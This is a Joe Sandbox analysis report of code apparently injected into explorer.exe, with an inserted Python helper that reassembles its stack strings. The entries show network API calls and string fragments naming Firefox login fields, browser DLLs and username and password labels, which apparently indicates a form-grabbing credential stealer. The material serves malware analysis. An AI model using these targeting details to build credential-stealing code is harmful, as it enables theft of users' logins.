                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 289 1396e72e-1396e768 290 1396e76a-1396e782 call 13971942 289->290 291 1396e788-1396e7ab connect 289->291 290->291
Memory Dump Source
• Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction ID: 6d610fba57c376a05d3e90bc21f10bc8b678317dac7c94669581f1f33c2ed7b8
• Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction Fuzzy Hash: 1A010C74618B188FCB84EF5CE088B55B7E0EB59314F1545AED90DCB266C674D9818BC2

Control-flow Graph: function at 1396e732; calls 13971942 and connect (rendered graph not reproduced)
Memory Dump Source
• Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction ID: 0264f9506c798fd22af57ef882a0365929ad00a326a0966fbba8986ee3046553
• Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction Fuzzy Hash: FA012C70618A1C8FCB84EF5CE088B55B7E0FB59314F1541BEE80DCB266CA74C9818BC2

Control-flow Graph: function at 1396e6b2; calls 13971942 and send (rendered graph not reproduced)
Memory Dump Source
• Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
Similarity
• API ID: send
• String ID: send
• API String ID: 2809346765-2809346765
• Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction ID: e9a9d2750bea23ebfae2b76bba147513b5bde18a4550433118999a90de1bceb6
• Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction Fuzzy Hash: BA011270518A188FDB84DF1CE048B1577E0EB58314F1545AED85DCB266C670D8818B85

Control-flow Graph: function at 1396e5b2; calls 13971942 and socket (rendered graph not reproduced)
Memory Dump Source
• Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
Similarity
• API ID: socket
• String ID: sock
• API String ID: 98920635-2415254727
• Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction ID: 484db8edaf2d4b76cb7101eb2478a59056fba8a17691b9008305283d64094548
• Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction Fuzzy Hash: EC012C70618A188FCB84EF1CE048B55BBE4FB59354F1545AEE85ECB266C7B0C9818B86

Control-flow Graph: function at 139662dd; loop around SleepEx with calls to 13971942, 13970f12, 13966e72, 13967432 and 139660f2 (rendered graph not reproduced)
Memory Dump Source
• Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction ID: 973e0c3d55146486e46d1abfb959f4f0e77b14f932cc689031969aa08de74dcc
• Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction Fuzzy Hash: 823178B4A05B49DFDB55DF298088699B7A5FB94320F48427EC92DCB206CB30A0A4CFD1

Control-flow Graph: function at 13966412; calls 13971942, 13973c9e and CreateThread (rendered graph not reproduced)
Memory Dump Source
• Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction ID: 2e675a3b5f849c281b20ae41253d5f5ca9474169aaee2e55586e5ffc7ac81508
• Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction Fuzzy Hash: 1EF0F634268B484FD788EF2CD48563AF3E0FBE9214F45063EE94DC3264DA39D9824B56

Memory Dump Source
• Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
• API String ID: 0-393284711
• Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction ID: d3c3fc840cd481d9052d172b521052ef9658c9d1488764eae254cf366ced1f2c
• Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction Fuzzy Hash: FEE15A74A18F488FCB64DF68C4947AAB7E1FB58304F504A2E959FC7245DF30A542CB89

Memory Dump Source
• Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
• API String ID: 0-393284711
• Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction ID: 7ef7d0cbc8552666bce3a254ef13c89b07680dcff34ca7e2d3a492694994efbb
• Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction Fuzzy Hash: 3DE18874618F488FCB64DF28C484BAAB7E1FB58304F504A2E959FC7255EF30A541CB89

Memory Dump Source
• Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
Similarity
• API ID:
• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
• API String ID: 0-2916316912
• Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction ID: 0ba788e9e977ad30628503a825525e4dfd30b2296ae500f84f456648da9f95b8
• Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction Fuzzy Hash: EEB18C30A18B488EDB55EF69C489AEEB7F1FF98304F50491ED49AC7251EF70A405CB86
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                                                        • API String ID: 0-2916316912
                                                                                                                                                                                                        • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                                        • Instruction ID: 9af89d22d7d4d01e3a5c4fa6387dcc920bc566e3a2b9914cc34d9a0e8de77bb0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CB1BA74518B488ECB19EF68C485AEEB7F2FF98304F40451ED49AC7251EF70A445CB8A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                                                        • API String ID: 0-1539916866
                                                                                                                                                                                                        • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                                        • Instruction ID: b3e1f0360542e3619761ea2b7fa8eda1b5a8e181b8fcfba60a5f98efeb45b5a1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB41B170B18B488FDF18DF88A4456BD7BE2FB48708F00425ED809D3245DBB5AD458BD6
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                                                        • API String ID: 0-1539916866
                                                                                                                                                                                                        • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                                        • Instruction ID: 0828b791e8a0cf818486bfb608cdef5b201d23de9c26bf1b5123642c2467f2a0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0941E371A18B088FDB14DF88A4467BDBBE2FB58714F00065ED409D3241DBB1AD45CBD6
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                                        • API String ID: 0-355182820
                                                                                                                                                                                                        • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                        • Instruction ID: 4a62dc79049344c4d6656b00ab241729fcbb21562868f677acfcaec9aa951bb3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67C15A74A18B099FCB58EF64C489AEAF7E1FF94304F40462E959AC7250DF30B515CB86
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                                        • API String ID: 0-355182820
                                                                                                                                                                                                        • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                        • Instruction ID: 0094ad14ee6ce88fa6bb8915b6bf5affa29406c9242c371476eb885b0ed479a7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31C17B75218F098FCB58EF28C48569AF7E2FB94308F40472E949AC7250DF71A555CB8A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                                                        • API String ID: 0-97273177
                                                                                                                                                                                                        • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                                        • Instruction ID: d82e6ecc8611cfeb61494142bc9972c6e91597d55a9b2fbe0073459ec11d529f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC51D674A1C7488FDB09DF18D4852AAB7E5FBC5704F50592EE8CBC7242DBB4A506CB82
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                                                        • API String ID: 0-97273177
                                                                                                                                                                                                        • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                                        • Instruction ID: f18e64853f62d8cc95d0e228b92468f7b2c17edeaedf221055808073edb7fd6c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1551F43161C7488FD719CF18C8812AAB7E5FBC5704F501A2EE8CBC7255DBB5A946CB82
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                                        • API String ID: 0-639201278
                                                                                                                                                                                                        • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                                        • Instruction ID: 5022030f04d7671b63f3d2328405554d820e45b524d5a582f67c9bb072d5b000
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73C16D74A18B1A4FCB58EF68D455AEAB3E1FF98304F41426E944EC7254DF30AA06CB85
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                                        • API String ID: 0-639201278
                                                                                                                                                                                                        • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                        • Instruction ID: 17d4c05c97fb013ab1cc1ade66f66657e8c7f11d421317815a204649b3ded407
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6C17D74A18B1A4FCB58EF68D455AEAF3E1FF98304F41426E944EC7254DF30AA06CB85
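The String ID lists above (`Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte` and `4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi`) are the shape a string takes when the compiler builds it on the stack with 32-bit immediate moves: the dump shows 4-byte pieces instead of the whole literal. The script below is an added example, not part of the Joe Sandbox report, and it is written to check an interpretation rather than assert one: it splits a String ID line into a multiset of fragments, chunks each candidate plaintext into 4-byte pieces the same way, and reports which candidates are fully explained by the fragments and which fragments remain unexplained. The candidate lists are assumptions of the example: Firefox `logins.json` field names (`usernameField`, `encryptedUsername`, `encryptedPassword`, `formSubmitURL`, `guid`, plus a few decoys that should not match) and browser DLL names (`nspr4.dll`, `sspicli.dll`, the two full names present in the list, plus `nss3.dll` as a decoy). Tails shorter than four bytes (the `d` of `usernameField`, the `L` of `formSubmitURL`) are emitted as byte or word moves and are not reported consistently, so they are not required for a match.

```python
"""Reassemble compiler-chunked stack strings from a Joe Sandbox String ID line.

Added example for reading the report, not code from Joe Sandbox or from the
sample. The candidate plaintexts are assumptions (Firefox logins.json keys and
browser DLL names); the script only verifies whether the fragments are
consistent with them.
"""
import re
from collections import Counter
from typing import Iterable, List, Tuple

# Constructed input: the two String ID values copied from the report entries.
FIREFOX_LINE = ("• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR"
                "$name$rnam$swor$user$ypte$ypte")
DLL_LINE = "• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi"

# Assumed candidates: Firefox logins.json field names (hostname, httpRealm and
# passwordField are included as decoys that the fragments should NOT explain).
FIREFOX_LOGIN_KEYS = ["hostname", "httpRealm", "formSubmitURL", "usernameField",
                      "passwordField", "encryptedUsername", "encryptedPassword",
                      "guid"]
# Assumed candidates: DLLs a form grabber would hook (nss3.dll is a decoy).
BROWSER_DLLS = ["nspr4.dll", "nss3.dll", "sspicli.dll", "dragon_s.dll",
                "opera_browser.dll"]


def parse_string_id(line: str) -> Counter:
    """Turn a '• String ID: a$b$c' line into a multiset of fragments."""
    value = re.sub(r"^\W*String ID:\s*", "", line.strip())
    return Counter(f for f in value.split("$") if f)


def chunk4(s: str) -> List[str]:
    """Chunk a literal the way 32-bit immediate stack moves expose it."""
    return [s[i:i + 4] for i in range(0, len(s), 4)]


def match_candidates(fragments: Counter, candidates: Iterable[str],
                     min_len: int = 4) -> Tuple[List[str], Counter]:
    """Greedily explain fragments with candidates.

    A candidate matches if it appears whole in the pool, or if every chunk of
    length >= min_len it would produce is still available; matched chunks are
    consumed so a duplicated fragment ('encr' twice) must be explained twice.
    Returns (matched candidates, unexplained fragments of length >= min_len).
    """
    pool = Counter(fragments)
    matched: List[str] = []
    for cand in candidates:
        if pool[cand] > 0:                       # whole literal in .rdata style
            pool[cand] -= 1
            matched.append(cand)
            continue
        need = Counter(c for c in chunk4(cand) if len(c) >= min_len)
        if need and all(pool[c] >= n for c, n in need.items()):
            pool -= need                         # consume the explained pieces
            matched.append(cand)
    leftover = Counter({c: n for c, n in pool.items()
                        if n > 0 and len(c) >= min_len})
    return matched, leftover


def explain(line: str, candidates: Iterable[str]) -> Tuple[List[str], Counter]:
    """Convenience wrapper: parse the report line, then match."""
    return match_candidates(parse_string_id(line), candidates)


if __name__ == "__main__":
    for line, cands in ((FIREFOX_LINE, FIREFOX_LOGIN_KEYS),
                        (DLL_LINE, BROWSER_DLLS)):
        found, left = explain(line, cands)
        print("explained:", found)
        print("unexplained 4-byte fragments:", dict(left) or "none")
```

An empty "unexplained" set is the useful signal: it means the fragment multiset is fully accounted for by the assumed plaintexts, with nothing left that the interpretation fails to cover. A non-empty set, or a decoy that matches, is a sign the candidate list is wrong and should be revisited against the disassembly rather than trusted.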
Strings
Memory Dump Source
• Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
Similarity
• API ID:
• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
• API String ID: 0-639201278
• Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
• Instruction ID: da9a9e23f1a5b3b6425a959ea911349b0ef4eff4e8dd773ef537323f03a4d2d6
• Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EC19174619F1A4FCB58EF68D455AAAB3E2FB98304F41432DC44AC7254EF31EA05CB89
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                                        • API String ID: 0-639201278
                                                                                                                                                                                                        • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                        • Instruction ID: bcf55690e7997e818653cf13f044a0ac4d707a82f82bdc74271f8964ffd1755b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3BC1A074619F1A4FCB58EF68D495AAAB3E2FB98304F41432DC44AC7254EF31E905CB89
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                                        • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                        • Instruction ID: c851dacc4e95cdbd4205e426834c8529f5cb3648614de3468c3f80b7ff8ecd77
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EDA1AE70A187488FDB19DFA89444BEEBBE1FF88304F40466DE48AD7291EF709546C789
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                                        • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                        • Instruction ID: 21277ebf9adcedc7c9a28a9338d9232e77353bf6252dab804b542d3b896684f8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64A1DF70618B488FDB19DFA89444BEEB7E2FF88304F00462DD48AD7241EF359546C78A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                                        • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                        • Instruction ID: 7fcd15b5b7c115da5102b9a51f021d7a0d7ddaeb6991f8101b0793dd2bc0f5b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC917E70A18B488FDB19DFA8D444BEEBBE1FB98304F40462EE48AD7251EF709545C789
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                                        • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                        • Instruction ID: 8463f4921742b8bc2e8dd4bf0a56c23e22e7029a0ad5a7b63432578d4bf1a111
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7591AD70618B488BDB19DFA8D444BEEB7E2FB88304F00462EE48AD7241EF759556C789
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $.$e$n$v
                                                                                                                                                                                                        • API String ID: 0-1849617553
                                                                                                                                                                                                        • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                        • Instruction ID: 32a92bc6c3bf0ececb693de4e044aae2734cf923b0a4d0db433cea0ea364ae03
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A719335A18B498FD754DFA8D4887AAB7F1FF54304F00062ED44AC7261EF71E9468B85
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
